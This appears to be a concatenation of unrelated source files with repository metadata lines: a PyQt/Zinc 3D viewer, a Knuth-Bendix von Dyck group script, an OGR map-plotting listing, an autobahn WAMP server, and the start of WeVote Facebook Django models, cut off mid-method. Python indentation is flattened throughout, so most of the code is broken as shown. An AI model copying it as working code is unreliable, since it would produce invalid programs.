divisionsText = "*".join('{:d}'.format(value) for value in totalDivisions)
msgBox.setText("Fine tessellation divisions " + divisionsText + " can take a long time to apply.")
msgBox.setInformativeText("Please confirm action.")
msgBox.setStandardButtons(QtGui.QMessageBox.Apply | QtGui.QMessageBox.Cancel)
msgBox.setDefaultButton(QtGui.QMessageBox.Cancel)
result = msgBox.exec_()
widget.blockSignals(False)
return result == QtGui.QMessageBox.Apply
def tessellationMinimumDivisionsDisplay(self):
'''
Display the current tessellation minimum divisions
'''
tessellationmodule = self._context.getTessellationmodule()
tessellation = tessellationmodule.getDefaultTessellation()
result, minimumDivisions = tessellation.getMinimumDivisions(3)
self._displayScaleInteger(self.ui.tessellation_minimum_divisions_lineedit, minimumDivisions)
def tessellationMinimumDivisionsEntered(self):
'''
Set default tessellation minimum divisions from values in widget
'''
try:
minimumDivisions = self._parseScaleInteger(self.ui.tessellation_minimum_divisions_lineedit)
# pack to length 3 for comparing with old values
while len(minimumDivisions) < 3:
minimumDivisions.append(minimumDivisions[-1])
tessellationmodule = self._context.getTessellationmodule()
tessellation = tessellationmodule.getDefaultTessellation()
result, oldMinimumDivisions = tessellation.getMinimumDivisions(3)
if minimumDivisions != oldMinimumDivisions:
result, refinementFactors = tessellation.getRefinementFactors(3)
if self._checkTessellationDivisions(minimumDivisions, refinementFactors, self.ui.tessellation_minimum_divisions_lineedit):
if RESULT_OK != tessellation.setMinimumDivisions(minimumDivisions):
raise
except:
print("Invalid tessellation minimum divisions")
#self.tessellationMinimumDivisionsDisplay()
def tessellationRefinementFactorsDisplay(self):
'''
Display the current tessellation refinement factors
'''
tessellationmodule = self._context.getTessellationmodule()
tessellation = tessellationmodule.getDefaultTessellation()
result, refinementFactors = tessellation.getRefinementFactors(3)
self._displayScaleInteger(self.ui.tessellation_refinement_factors_lineedit, refinementFactors)
def tessellationRefinementFactorsEntered(self):
'''
Set default tessellation refinement factors from values in widget
'''
try:
refinementFactors = self._parseScaleInteger(self.ui.tessellation_refinement_factors_lineedit)
# pack to length 3 for comparing with old values
while len(refinementFactors) < 3:
refinementFactors.append(refinementFactors[-1])
tessellationmodule = self._context.getTessellationmodule()
tessellation = tessellationmodule.getDefaultTessellation()
result, oldRefinementFactors = tessellation.getRefinementFactors(3)
if refinementFactors != oldRefinementFactors:
result, minimumDivisions = tessellation.getMinimumDivisions(3)
if self._checkTessellationDivisions(minimumDivisions, refinementFactors, self.ui.tessellation_refinement_factors_lineedit):
if RESULT_OK != tessellation.setRefinementFactors(refinementFactors):
raise
except:
print("Invalid tessellation refinement factors")
#self.tessellationRefinementFactorsDisplay()
def tessellationCircleDivisionsDisplay(self):
'''
Display the current tessellation circle divisions
'''
tessellationmodule = self._context.getTessellationmodule()
tessellation = tessellationmodule.getDefaultTessellation()
circleDivisions = tessellation.getCircleDivisions()
self.ui.tessellation_circle_divisions_lineedit.setText(str(circleDivisions))
def tessellationCircleDivisionsEntered(self):
'''
Set tessellation circle divisions from values in widget
'''
try:
circleDivisions = int(self.ui.tessellation_circle_divisions_lineedit.text())
tessellationmodule = self._context.getTessellationmodule()
# set circle divisions for all tessellation in module
result = RESULT_OK
tessellationmodule.beginChange()
iter = tessellationmodule.createTessellationiterator()
tessellation = iter.next()
while tessellation.isValid():
result = tessellation.setCircleDivisions(circleDivisions)
if RESULT_OK != result:
break # can't raise here otherwise no call to endChange()
tessellation = iter.next()
tessellationmodule.endChange()
if RESULT_OK != result:
raise
except:
print("Invalid tessellation circle divisions")
#self.tessellationCircleDivisionsDisplay()
def perturbLinesStateChanged(self, state):
'''
Set perturb lines flag from checkbox
'''
sceneviewer = self.ui.sceneviewerwidget.getSceneviewer()
sceneviewer.setPerturbLinesFlag(state)
def spectrumAutorangeClicked(self):
'''
Set spectrum min/max to fit range of visible data in scene graphics.
'''
sceneviewer = self.ui.sceneviewerwidget.getSceneviewer()
scene = sceneviewer.getScene()
filter = sceneviewer.getScenefilter()
spectrummodule = scene.getSpectrummodule()
spectrum = spectrummodule.getDefaultSpectrum()
result, minimum, maximum = scene.getSpectrumDataRange(filter, spectrum, 1)
if result >= 1: # result is number of components with range, can exceed 1
spectrummodule.beginChange()
spectrumcomponent = spectrum.getFirstSpectrumcomponent()
spectrumcomponent.setRangeMinimum(minimum)
spectrumcomponent.setRangeMaximum(maximum)
spectrummodule.endChange()
self.spectrumMinimumDisplay()
self.spectrumMaximumDisplay()
def spectrumMinimumDisplay(self):
'''
Display the current default spectrum minimum
'''
scene = self.ui.sceneviewerwidget.getSceneviewer().getScene()
spectrummodule = scene.getSpectrummodule()
spectrum = spectrummodule.getDefaultSpectrum()
spectrumcomponent = spectrum.getFirstSpectrumcomponent()
minimum = spectrumcomponent.getRangeMinimum()
self._displayReal(self.ui.spectrum_minimum_lineedit, minimum)
def spectrumMinimumEntered(self):
'''
Set default spectrum minimum from value in the widget
'''
try:
minimum = float(self.ui.spectrum_minimum_lineedit.text())
scene = self.ui.sceneviewerwidget.getSceneviewer().getScene()
spectrummodule = scene.getSpectrummodule()
spectrum = spectrummodule.getDefaultSpectrum()
spectrumcomponent = spectrum.getFirstSpectrumcomponent()
if RESULT_OK != spectrumcomponent.setRangeMinimum(minimum):
raise
except:
print("Invalid spectrum minimum")
self.spectrumMinimumDisplay()
def spectrumMaximumDisplay(self):
'''
Display the current default spectrum maximum
'''
scene = self.ui.sceneviewerwidget.getSceneviewer().getScene()
spectrummodule = scene.getSpectrummodule()
spectrum = spectrummodule.getDefaultSpectrum()
spectrumcomponent = spectrum.getFirstSpectrumcomponent()
maximum = spectrumcomponent.getRangeMaximum()
self._displayReal(self.ui.spectrum_maximum_lineedit, maximum)
def spectrumMaximumEntered(self):
'''
Set default spectrum maximum from value in the widget
'''
try:
maximum = float(self.ui.spectrum_maximum_lineedit.text())
scene = self.ui.sceneviewerwidget.getSceneviewer().getScene()
spectrummodule = scene.getSpectrummodule()
spectrum = spectrummodule.getDefaultSpectrum()
spectrumcomponent = spectrum.getFirstSpectrumcomponent()
if RESULT_OK != spectrumcomponent.setRangeMaximum(maximum):
raise
except:
print("Invalid spectrum maximum")
self.spectrumMaximumDisplay()
def spectrumAddColourBarClicked(self):
'''
Add an overlay graphics showing the default spectrum colour bar.
'''
sceneviewer = self.ui.sceneviewerwidget.getSceneviewer()
scene = sceneviewer.getScene()
scene.beginChange()
spectrummodule = scene.getSpectrummodule()
spectrum = spectrummodule.getDefaultSpectrum()
glyphmodule = scene.getGlyphmodule()
glyphmodule.beginChange()
colourbar = glyphmodule.findGlyphByName("colourbar")
if not colourbar.isValid():
colourbar = glyphmodule.createGlyphColourBar(spectrum)
colourbar.setName("colourbar")
glyphmodule.endChange()
graphics = scene.findGraphicsByName("colourbar")
if graphics.isValid():
scene.removeGraphics(graphics)
graphics = scene.createGraphicsPoints()
graphics.setName("colourbar")
graphics.setScenecoordinatesystem(SCENECOORDINATESYSTEM_NORMALISED_WINDOW_FIT_LEFT)
pointattributes = graphics.getGraphicspointattributes()
pointattributes.setGlyph(colourbar)
pointattributes.setBaseSize([1.0,1.0,1.0])
pointattributes.setGlyphOffset([-0.9,0.0,0.0])
scene.endChange()
# ensure scene editor graphics list is redisplayed
self.ui.scene_editor.setScene(scene)
def timeAutorangeClicked(self):
'''
Set time min/max to time range of finite element field parameters.
'''
minimum, maximum = ZincRegion_getTimeRange(self._rootRegion)
if minimum is None:
minimum = 0.0
maximum = 0.0
timekeepermodule = self._context.getTimekeepermodule()
timekeeper = timekeepermodule.getDefaultTimekeeper()
timekeeper.setMinimumTime(minimum)
timekeeper.setMaximumTime(maximum)
self.timeMinimumDisplay()
self.timeMaximumDisplay()
currentTime = timekeeper.getTime()
if currentTime < minimum:
timekeeper.setTime(minimum)
elif currentTime > maximum:
timekeeper.setTime(maximum)
self.timeTextDisplay()
self.timeSliderDisplay()
def timeMinimumDisplay(self):
'''
Display the current default timekeeper minimum time
'''
scene = self.ui.sceneviewerwidget.getSceneviewer().getScene()
timekeepermodule = scene.getTimekeepermodule()
timekeeper = timekeepermodule.getDefaultTimekeeper()
minimum = timekeeper.getMinimumTime()
self._displayReal(self.ui.time_minimum_lineedit, minimum)
def timeMinimumEntered(self):
'''
Set default timekeeper minimum time from value in the widget
'''
try:
minimum = float(self.ui.time_minimum_lineedit.text())
scene = self.ui.sceneviewerwidget.getSceneviewer().getScene()
timekeepermodule = scene.getTimekeepermodule()
timekeeper = timekeepermodule.getDefaultTimekeeper()
if RESULT_OK != timekeeper.setMinimumTime(minimum):
raise
except:
print("Invalid minimum time")
self.timeMinimumDisplay()
def timeMaximumDisplay(self):
'''
Display the current default timekeeper maximum time
'''
scene = self.ui.sceneviewerwidget.getSceneviewer().getScene()
timekeepermodule = scene.getTimekeepermodule()
timekeeper = timekeepermodule.getDefaultTimekeeper()
maximum = timekeeper.getMaximumTime()
self._displayReal(self.ui.time_maximum_lineedit, maximum)
def timeMaximumEntered(self):
'''
Set default timekeeper maximum time from value in the widget
'''
try:
maximum = float(self.ui.time_maximum_lineedit.text())
scene = self.ui.sceneviewerwidget.getSceneviewer().getScene()
timekeepermodule = scene.getTimekeepermodule()
timekeeper = timekeepermodule.getDefaultTimekeeper()
if RESULT_OK != timekeeper.setMaximumTime(maximum):
raise
except:
print("Invalid maximum time")
self.timeMaximumDisplay()
def timeTextDisplay(self):
'''
Display the default timekeeper current time
'''
scene = self.ui.sceneviewerwidget.getSceneviewer().getScene()
timekeepermodule = scene.getTimekeepermodule()
timekeeper = timekeepermodule.getDefaultTimekeeper()
time = timekeeper.getTime()
self._displayReal(self.ui.time_text_lineedit, time)
def timeTextEntered(self):
'''
Set default timekeeper current time from value in the widget
'''
try:
time = float(self.ui.time_text_lineedit.text())
scene = self.ui.sceneviewerwidget.getSceneviewer().getScene()
timekeepermodule = scene.getTimekeepermodule()
timekeeper = timekeepermodule.getDefaultTimekeeper()
if RESULT_OK != timekeeper.setTime(time):
raise
self.timeSliderDisplay()
except:
print("Invalid current time")
self.timeTextDisplay()
def timeSliderDisplay(self):
'''
Display the default timekeeper current time on the time slider
'''
scene = self.ui.sceneviewerwidget.getSceneviewer().getScene()
timekeepermodule = scene.getTimekeepermodule()
timekeeper = timekeepermodule.getDefaultTimekeeper()
minimum = timekeeper.getMinimumTime()
maximum = timekeeper.getMaximumTime()
time = timekeeper.getTime()
# don't want signal for my change
self.ui.time_slider.blockSignals(True)
if maximum != minimum:
            value = int((time - minimum)*(10000.999/(maximum - minimum)))
else:
value = 0
self.ui.time_slider.setValue(value)
self.ui.time_slider.blockSignals(False)
def timeSliderChanged(self, value):
'''
        Set default timekeeper current time from slider value
'''
scene = self.ui.sceneviewerwidget.getSceneviewer().getScene()
timekeepermodule = scene.getTimekeepermodule()
timekeeper = timekeepermodule.getDefaultTimekeeper()
minimum = timekeeper.getMinimumTime()
maximum = timekeeper.getMaximumTime()
if maximum != minimum:
            time = minimum + float(value)*((maximum - minimum)/10000.0)
else:
time = minimum
timekeeper.setTime(time)
self.timeTextDisplay()
def saveImageClicked(self):
'''
Save the view in the window to an image file.
'''
fileNameTuple = QtGui.QFileDialog.getSaveFileName(self, "Save image", "", "Image files (*.jpg *.png *.tif *.*)")
fileName = fileNameTuple[0]
if not fileName:
return
image = self.ui.sceneviewerwidget.grabFrameBuffer()
image.save(fileName)
def exportSceneViewersettings(self, outputPrefix, numberOfResources):
scene = self.ui.sceneviewerwidget.getSceneviewer().getScene()
si = scene.createStreaminformationScene()
si.setIOFormat(si.IO_FORMAT_THREEJS)
si.setIODataType(si.IO_FORMAT_THREEJS)
timekeepermodule = scene.getTimekeepermodule()
timekeeper = timekeepermodule.getDefaultTimekeeper()
minimum = timekeeper.getMinimumTime()
maximum = timekeeper.getMaximumTime()
time_enabled = 0
if (maximum - minimum) > 0.001:
time_enabled = 1
sv = self.ui.sceneviewerwidget.getSceneviewer()
sv.viewAll()
nearPlane = sv.getNearClippingPlane()
farPlane = sv.getFarClippingPlane()
result, eyePos, lookat, upVector = sv.getLookatParameters()
obj = { "nearPlane": nearPlane, "farPlane": farPlane, "eyePosition": eyePos, "targetPosition": lookat, "upVector": upVector, "numberOfResources": numberOfResources, "timeEnabled" : time_enabled}
outputName = outputPrefix + "_view.json"
export_f = open(outputName, "wb+")
export_f.write(json.dumps(obj))
export_f.close()
def exportScene(self, outputPrefix):
scene = self.ui.sceneviewerwidget.getSceneviewer().getScene()
si = scene.createStreaminformationScene()
si.setIOFormat(si.IO_FORMAT_THREEJS)
si.setIODataType(si.IO_FORMAT_THREEJS)
timekeepermodule = scene.getTimekeepermodule()
timekeeper = timekeepermodule.getDefaultTimekeeper()
minimum = timekeeper.getMinimumTime()
maximum = timekeeper.getMaximumTime()
if (maximum - minimum) > 0.0:
si.setInitialTime(minimum)
si.setFinishTime(maximum)
si.setNumberOfTimeSteps(51)
number = si.getNumberOfResourcesRequired()
i = 0
srs = []
while i < number:
outputName = outputPrefix + "_" + str(i + 1) + ".json"
srs.append(si.createStreamresourceFile(outputName))
i = i + 1
scene.exportScene(si)
return number
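    # Illustrative note: for an output prefix such as "mymodel" (hypothetical), exportScene()
    # writes mymodel_1.json ... mymodel_<n>.json (one file per scene resource) and returns n,
    # while exportSceneViewersettings() adds mymodel_view.json with the camera settings.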
def saveWebGLClicked(self):
'''
Save the view in the window to WebGL content.
'''
fileNameTuple = QtGui.QFileDialog.getSaveFileName(self, "Specify prefix", "")
fileName = fileNameTuple[0]
if not fileName:
return
#print("reading file", fileName, ", filter", fileFilter)
# set current directory to path from file, to support scripts and fieldml with external resources
# Not implemented
numberOfResources = self.exportScene(fileName)
self.exportSceneViewersettings(fileName, numberOfResources)
# main start
def main(argv):
'''
The entry point for the application, handle application arguments and initialise the
GUI.
'''
app = QtGui.QApplication(argv)
w = ZincView()
w.show()
sys.exit(app.exec_())
# main end
if __name__ == '__main__':
main(sys.argv)
| mpl-2.0 | -1,349,197,757,580,551,200 | 40.822404 | 202 | 0.641471 | false |
dmishin/knuth_bendix | vondyck.py | 1 | 4552 | from knuth_bendix import knuthBendix, RewriteRuleset, shortLex
def vdRule(n, m, k=2):
"""Create initial ruleset for von Dyck group with inverse elements
https://en.wikipedia.org/wiki/Triangle_group#von_Dyck_groups
"""
return RewriteRuleset({
tuple('aA'): (),
tuple('Aa'): (),
tuple('bB'): (),
tuple('Bb'): (),
tuple('BA'*k): (),
tuple('ab'*k): (),
tuple( 'A'*n ): (),
tuple( 'a'*n ): (),
tuple( 'B'*m ): (),
tuple( 'b'*m ): () })
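# Illustrative usage (mirrors the __main__ block at the bottom of this file): complete the
# ruleset with Knuth-Bendix to get a confluent rewriting system for the (p, q, 2) triangle group.
#   rules = vdRule(4, 4)
#   confluent = knuthBendix(rules)
#   printVDRules(confluent)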
def vdNoInverse(n, m, k=2):
return RewriteRuleset({
tuple('ab'*k): (),
tuple( 'a'*n ): (),
tuple( 'b'*m ): () })
def groupPowers(s):
    """Yield (symbol, run_length) pairs for consecutive runs of equal symbols in s."""
last = None
lastPow = None
for x in s:
if last is None:
last = x
lastPow = 1
else:
if x == last:
lastPow += 1
else:
yield last, lastPow
last = x
lastPow = 1
if last is not None:
yield last, lastPow
def groupedShortLex(s1, s2):
p1 = tuple(groupPowers(s1))
p2 = tuple(groupPowers(s2))
print ("####", s1,p1," <> ", s2,p2)
return shortLex( p1, p2)
def groupPowersVd(s):
    """Like groupPowers, but report upper-case generators as negative powers of their lower-case form."""
for x, p in groupPowers(s):
if x.upper() == x:
yield x.lower(), -p
else:
yield x, p
def showGroupedPowers(s):
if not s: return "e"
return " ".join( (x if p == 1 else x+"^"+str(p))
for x, p in groupPowersVd(s))
def printVDRules(rules1):
print ("{")
for v,w in rules1._sortedItems():
print(" {sv}\t-> {sw}".format(sv = showGroupedPowers(v),
sw = showGroupedPowers(w)))
print ("}")
import itertools
def powers(n):
    # nonzero powers from -(n//2) up to n - n//2, interleaved as 1, -1, 2, -2, ...
for a,b in itertools.zip_longest( range(1, n-n//2+1),
range(1, n//2+1)):
if a is not None: yield a
if b is not None: yield -b
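# Example values (computed from the definition above, shown for illustration):
#   list(powers(4)) == [1, -1, 2, -2]
#   list(powers(5)) == [1, -1, 2, -2, 3]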
def powerVondyck(n, m):
""" each element of double VD group is some power of the original VD elements.
    powers are ordered from highest to lowest"""
elements = []
for p in reversed(list(powers(n))):
elements.append(('a', p))
for p in reversed(list(powers(m))):
elements.append(('b', p))
element2index = {e:i for i, e in enumerate(elements)}
a = element2index[('a', 1)]
ia = element2index[('a', -1)]
b = element2index[('b', 1)]
ib = element2index[('b', -1)]
def showElement(i):
a, p = elements[i]
return "%s^%s"%(a,p)
relations = {}
#generate identities.
# powers
for i1,(c1, p1) in enumerate(elements):
for i2, (c2, p2) in enumerate(elements):
if c1 != c2: continue
order = n if c1 == 'a' else m
ps = (p1 + p2 + order//2)%order - order //2
print ("#####", showElement(i1),"*",showElement(i2),"=",ps)
if ps == 0:
relations[(i1,i2)] = ()
else:
relations[(i1,i2)] = (element2index[(c1, ps)],)
# special identities:
# abab = e
# BABA = e
relations[(a,b,a,b)] = ()
relations[(ib,ia,ib,ia)] = ()
return RewriteRuleset(relations), showElement
if __name__=="__main__":
#rules = vdNoInverse( 4, 4)
import sys
try:
p = int(sys.argv[1])
q = int(sys.argv[2])
except IndexError:
print("Usage: vondyck p q")
exit(1)
print ("========== Rule for vD({p},{q},2) ==========".format(**locals()))
rules = vdRule(p, q)
showElem = str
#rules, showElem = powerVondyck(p, q)
def showProgress(i, s):
#print ("Iteration {i}, ruleset size: {n}".format(i=i,n=s.size()))
pass
rules1 = knuthBendix (rules, onIteration=showProgress, maxRulesetSize=10000)
for i,(v,w) in enumerate(rules1._sortedItems()):
print("{i:2}) {sv}\t-> {sw}".format(i=i+1,
sv = showGroupedPowers(v),
sw = showGroupedPowers(w)))
if True:
from automaton import *
automaton, initial_state = build_accepting_automaton( 'abAB', list(rules1.suffices()) )
#symbolic growth func
print("Growth function:")
func = automaton_growth_func(automaton, initial_state)
import sympy
func = sympy.cancel(func)
print(func)
| mit | -8,688,118,971,699,404,000 | 26.257485 | 95 | 0.491872 | false |
cgarrard/osgeopy-code | Chapter13/listing13_4.py | 1 | 1939 | # Script to draw world countries as patches.
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.path import Path
import matplotlib.patches as patches
from osgeo import ogr
def order_coords(coords, clockwise):
"""Orders coordinates."""
total = 0
x1, y1 = coords[0]
for x, y in coords[1:]:
total += (x - x1) * (y + y1)
x1, y1 = x, y
x, y = coords[0]
total += (x - x1) * (y + y1)
is_clockwise = total > 0
if clockwise != is_clockwise:
coords.reverse()
return coords
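# A minimal sketch (illustrative coordinates, not taken from the shapefile) of how
# order_coords() forces a ring into clockwise order:
def _order_coords_example():
    square = [(0, 0), (1, 0), (1, 1), (0, 1)]   # counter-clockwise ring
    return order_coords(list(square), True)     # -> [(0, 1), (1, 1), (1, 0), (0, 0)], clockwise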
def make_codes(n):
"""Makes a list of path codes."""
codes = [Path.LINETO] * n
codes[0] = Path.MOVETO
return codes
def plot_polygon_patch(poly, color):
"""Plots a polygon as a patch."""
# Outer clockwise path.
coords = poly.GetGeometryRef(0).GetPoints()
coords = order_coords(coords, True)
codes = make_codes(len(coords))
for i in range(1, poly.GetGeometryCount()):
# Inner counter-clockwise paths.
coords2 = poly.GetGeometryRef(i).GetPoints()
coords2 = order_coords(coords2, False)
codes2 = make_codes(len(coords2))
# Concatenate the paths.
coords = np.concatenate((coords, coords2))
codes = np.concatenate((codes, codes2))
# Add the patch to the plot
path = Path(coords, codes)
patch = patches.PathPatch(path, facecolor=color)
plt.axes().add_patch(patch)
# Loop through all of the features in the countries layer and create
# patches for the polygons.
ds = ogr.Open(r'D:\osgeopy-data\global\ne_110m_admin_0_countries.shp')
lyr = ds.GetLayer(0)
for row in lyr:
geom = row.geometry()
if geom.GetGeometryType() == ogr.wkbPolygon:
plot_polygon_patch(geom, 'yellow')
elif geom.GetGeometryType() == ogr.wkbMultiPolygon:
for i in range(geom.GetGeometryCount()):
plot_polygon_patch(geom.GetGeometryRef(i), 'yellow')
plt.axis('equal')
plt.show()
| mit | 7,704,621,990,206,990,000 | 29.777778 | 70 | 0.643115 | false |
aleneum/kogniserver | src/kogniserver/async.py | 1 | 2307 | import logging
import os
from threading import Thread
import time
try:
import asyncio
except ImportError:
# Trollius >= 0.3 was renamed
import trollius as asyncio
from autobahn.asyncio.wamp import ApplicationSession
from services import SessionHandler
class Ping(Thread):
def __init__(self, wamp):
Thread.__init__(self)
self.running = True
self.wamp = wamp
def run(self):
try:
while self.running:
logging.debug("ping")
self.wamp.publish(u'com.wamp.ping', "ping")
time.sleep(1)
except Exception as e:
logging.debug(e)
raise e
class Component(ApplicationSession):
@staticmethod
def on_ping(event):
logging.debug(event)
@asyncio.coroutine
def onJoin(self, details):
if os.environ.get('DEBUG') in ['1','True','true','TRUE']:
log_level = logging.DEBUG
else:
log_level = logging.INFO
logging.basicConfig()
logging.getLogger().setLevel(log_level)
self.session = SessionHandler(self, log_level)
# register RPC
reg = yield self.register(self.session.register_scope, u'service.displayserver.register')
rpc = yield self.register(self.session.call_rpc, u'service.displayserver.call')
# setup ping
sub = yield self.subscribe(self.on_ping, u'com.wamp.ping')
self.ping = Ping(self)
self.ping.start()
print 'kogniserver(asyncio) started...'
def onLeave(self, details):
self.ping.running = False
while self.ping.isAlive():
time.sleep(0.1)
self.session.quit()
print "kogniserver session left..."
def main_entry(ssl_cert=None):
from autobahn.asyncio.wamp import ApplicationRunner
proto = "wss" if ssl_cert else "ws"
options = None
if ssl_cert:
raise RuntimeError("asyncio backend does not support ssl")
runner = ApplicationRunner(url=u"{0}://127.0.0.1:8181/ws".format(proto),
realm=u"realm1", ssl=options)
try:
runner.run(Component)
    except (KeyboardInterrupt, Exception):
raise KeyboardInterrupt
print "shutting down kogniserver..."
if __name__ == '__main__':
main_entry()
| mit | 8,312,911,809,580,319,000 | 26.141176 | 97 | 0.61075 | false |
jainanisha90/WeVoteServer | import_export_facebook/models.py | 1 | 55791 | # import_export_facebook/models.py
# Brought to you by We Vote. Be good.
# -*- coding: UTF-8 -*-
from django.core.validators import RegexValidator
from django.db import models
from email_outbound.models import SEND_STATUS_CHOICES, TO_BE_PROCESSED
from wevote_functions.functions import generate_random_string, positive_value_exists, convert_to_int
from exception.models import handle_exception, print_to_log
import wevote_functions.admin
import facebook
logger = wevote_functions.admin.get_logger(__name__)
FRIEND_INVITATION_FACEBOOK_TEMPLATE = 'FRIEND_INVITATION_FACEBOOK_TEMPLATE'
GENERIC_EMAIL_FACEBOOK_TEMPLATE = 'GENERIC_EMAIL_FACEBOOK_TEMPLATE'
KIND_OF_FACEBOOK_TEMPLATE_CHOICES = (
(GENERIC_EMAIL_FACEBOOK_TEMPLATE, 'Generic Email'),
(FRIEND_INVITATION_FACEBOOK_TEMPLATE, 'Invite Friend'),
)
class FacebookAuthResponse(models.Model):
"""
This is the authResponse data from a Facebook authentication
"""
voter_device_id = models.CharField(
verbose_name="voter_device_id initiating Facebook Auth", max_length=255, null=False, blank=False, unique=True)
datetime_of_authorization = models.DateTimeField(verbose_name='date and time of action', null=False, auto_now=True)
# Comes from Facebook authResponse FACEBOOK_LOGGED_IN
facebook_access_token = models.CharField(
verbose_name="accessToken from Facebook", max_length=255, null=True, blank=True, unique=False)
facebook_expires_in = models.IntegerField(verbose_name="expiresIn from Facebook", null=True, blank=True)
facebook_signed_request = models.TextField(verbose_name="signedRequest from Facebook", null=True, blank=True)
facebook_user_id = models.BigIntegerField(verbose_name="facebook big integer id", null=True, blank=True)
# Comes from FACEBOOK_RECEIVED_DATA
facebook_email = models.EmailField(verbose_name='facebook email address', max_length=255, unique=False,
null=True, blank=True)
facebook_first_name = models.CharField(
verbose_name="first_name from Facebook", max_length=255, null=True, blank=True, unique=False)
facebook_middle_name = models.CharField(
verbose_name="first_name from Facebook", max_length=255, null=True, blank=True, unique=False)
facebook_last_name = models.CharField(
verbose_name="first_name from Facebook", max_length=255, null=True, blank=True, unique=False)
    facebook_profile_image_url_https = models.URLField(
        verbose_name="url of voter's image from facebook", blank=True, null=True)
    facebook_background_image_url_https = models.URLField(
        verbose_name="url of voter's background 'cover' image from facebook "
                     "(like the twitter banner photo)", blank=True, null=True)
facebook_background_image_offset_x = models.IntegerField(verbose_name="x offset of facebook cover image", default=0,
null=True, blank=True)
facebook_background_image_offset_y = models.IntegerField(verbose_name="y offset of facebook cover image", default=0,
null=True, blank=True)
def get_full_name(self):
full_name = self.facebook_first_name if positive_value_exists(self.facebook_first_name) else ''
full_name += " " if positive_value_exists(self.facebook_first_name) \
and positive_value_exists(self.facebook_last_name) else ''
full_name += self.facebook_last_name if positive_value_exists(self.facebook_last_name) else ''
if not positive_value_exists(full_name) and positive_value_exists(self.facebook_email):
            full_name = self.facebook_email.split("@", 1)[0]
return full_name
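    # For example (illustrative): with facebook_first_name "Jane" and facebook_last_name "Doe",
    # get_full_name() returns "Jane Doe"; with neither name and facebook_email
    # "jane@example.org", it falls back to "jane".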
class FacebookLinkToVoter(models.Model):
"""
This is the link between a Facebook account and a We Vote voter account
"""
voter_we_vote_id = models.CharField(verbose_name="we vote id for the email owner", max_length=255, unique=True)
facebook_user_id = models.BigIntegerField(verbose_name="facebook big integer id", null=False, unique=True)
secret_key = models.CharField(
verbose_name="secret key to verify ownership facebook account", max_length=255, null=False, unique=True)
date_last_changed = models.DateTimeField(verbose_name='date last changed', null=False, auto_now=True)
class FacebookMessageOutboundDescription(models.Model):
"""
A description of the Facebook direct message we want to send.
"""
alphanumeric = RegexValidator(r'^[0-9a-zA-Z]*$', message='Only alphanumeric characters are allowed.')
kind_of_send_template = models.CharField(max_length=50, choices=KIND_OF_FACEBOOK_TEMPLATE_CHOICES,
default=GENERIC_EMAIL_FACEBOOK_TEMPLATE)
sender_voter_we_vote_id = models.CharField(
verbose_name="we vote id for the sender", max_length=255, null=True, blank=True, unique=False)
recipient_voter_we_vote_id = models.CharField(
verbose_name="we vote id for the recipient if we have it", max_length=255, null=True, blank=True, unique=False)
recipient_facebook_id = models.BigIntegerField(verbose_name="facebook big integer id", null=True, blank=True)
recipient_facebook_email = models.EmailField(verbose_name='facebook email address', max_length=255, unique=False,
null=True, blank=True)
recipient_fb_username = models.CharField(unique=True, max_length=50, validators=[alphanumeric], null=True)
send_status = models.CharField(max_length=50, choices=SEND_STATUS_CHOICES, default=TO_BE_PROCESSED)
class FacebookUser(models.Model):
"""
My facebook friends details, from the perspective of facebook id of me
"""
facebook_user_id = models.BigIntegerField(verbose_name="facebook id of user", null=False, unique=False)
facebook_user_name = models.CharField(
verbose_name="User name from Facebook", max_length=255, null=True, blank=True, unique=False)
facebook_user_first_name = models.CharField(
verbose_name="User's first_name from Facebook", max_length=255, null=True, blank=True, unique=False)
facebook_user_middle_name = models.CharField(
verbose_name="User's middle_name from Facebook", max_length=255, null=True, blank=True, unique=False)
facebook_email = models.EmailField(verbose_name='facebook email address', max_length=255, unique=False,
null=True, blank=True)
facebook_user_location_id = models.BigIntegerField(
verbose_name="location id of Facebook user", null=True, unique=False)
facebook_user_location_name = models.CharField(
verbose_name="User's location name from Facebook", max_length=255, null=True, blank=True, unique=False)
facebook_user_gender = models.CharField(
verbose_name="User's gender from Facebook", max_length=255, null=True, blank=True, unique=False)
facebook_user_birthday = models.CharField(
verbose_name="User's birthday from Facebook", max_length=255, null=True, blank=True, unique=False)
facebook_user_last_name = models.CharField(
verbose_name="User's last_name from Facebook", max_length=255, null=True, blank=True, unique=False)
facebook_profile_image_url_https = models.URLField(verbose_name='url of voter image from facebook',
blank=True, null=True)
facebook_background_image_url_https = models.URLField(verbose_name='url of cover image from facebook',
blank=True, null=True)
facebook_background_image_offset_x = models.IntegerField(verbose_name="x offset of facebook cover image", default=0,
null=True, blank=True)
facebook_background_image_offset_y = models.IntegerField(verbose_name="y offset of facebook cover image", default=0,
null=True, blank=True)
we_vote_hosted_profile_image_url_large = models.URLField(verbose_name='we vote hosted large image url',
blank=True, null=True)
we_vote_hosted_profile_image_url_medium = models.URLField(verbose_name='we vote hosted medium image url',
blank=True, null=True)
we_vote_hosted_profile_image_url_tiny = models.URLField(verbose_name='we vote hosted tiny image url',
blank=True, null=True)
facebook_user_about = models.CharField(
verbose_name="User's About from Facebook", max_length=255, null=True, blank=True, unique=False)
facebook_user_is_verified = models.BooleanField(
verbose_name="User is verfired from Facebook", default=False)
facebook_user_friend_total_count = models.BigIntegerField(
verbose_name="total count of friends from facebook", null=True, unique=False)
class FacebookFriendsUsingWeVote(models.Model):
"""
    My facebook friends' ids who are already using the We Vote app, from the perspective of my facebook id
"""
facebook_id_of_me = models.BigIntegerField(verbose_name="facebook id of viewer", null=False, unique=False)
facebook_id_of_my_friend = models.BigIntegerField(verbose_name="facebook id of my friend", null=False, unique=False)
class FacebookManager(models.Model):
def __unicode__(self):
return "FacebookManager"
def create_facebook_link_to_voter(self, facebook_user_id, voter_we_vote_id):
create_new_facebook_link = True
facebook_link_to_voter = None
facebook_link_to_voter_saved = False
status = ""
success = True
if not positive_value_exists(facebook_user_id) or not positive_value_exists(voter_we_vote_id):
status += "CREATE_FACEBOOK_LINK_MISSING_REQUIRED_VARIABLES "
print_to_log(logger=logger, exception_message_optional=status)
success = False
results = {
'success': success,
'status': status,
'facebook_link_to_voter_saved': facebook_link_to_voter_saved,
'facebook_link_to_voter': facebook_link_to_voter,
}
return results
# Does a link already exist?
try:
facebook_link_to_voter = FacebookLinkToVoter.objects.get(
facebook_user_id=facebook_user_id,
)
success = True
status += "FACEBOOK_LINK_TO_VOTER_ALREADY_EXISTS "
if voter_we_vote_id == facebook_link_to_voter.voter_we_vote_id:
facebook_link_to_voter_saved = True
create_new_facebook_link = False
success = True
else:
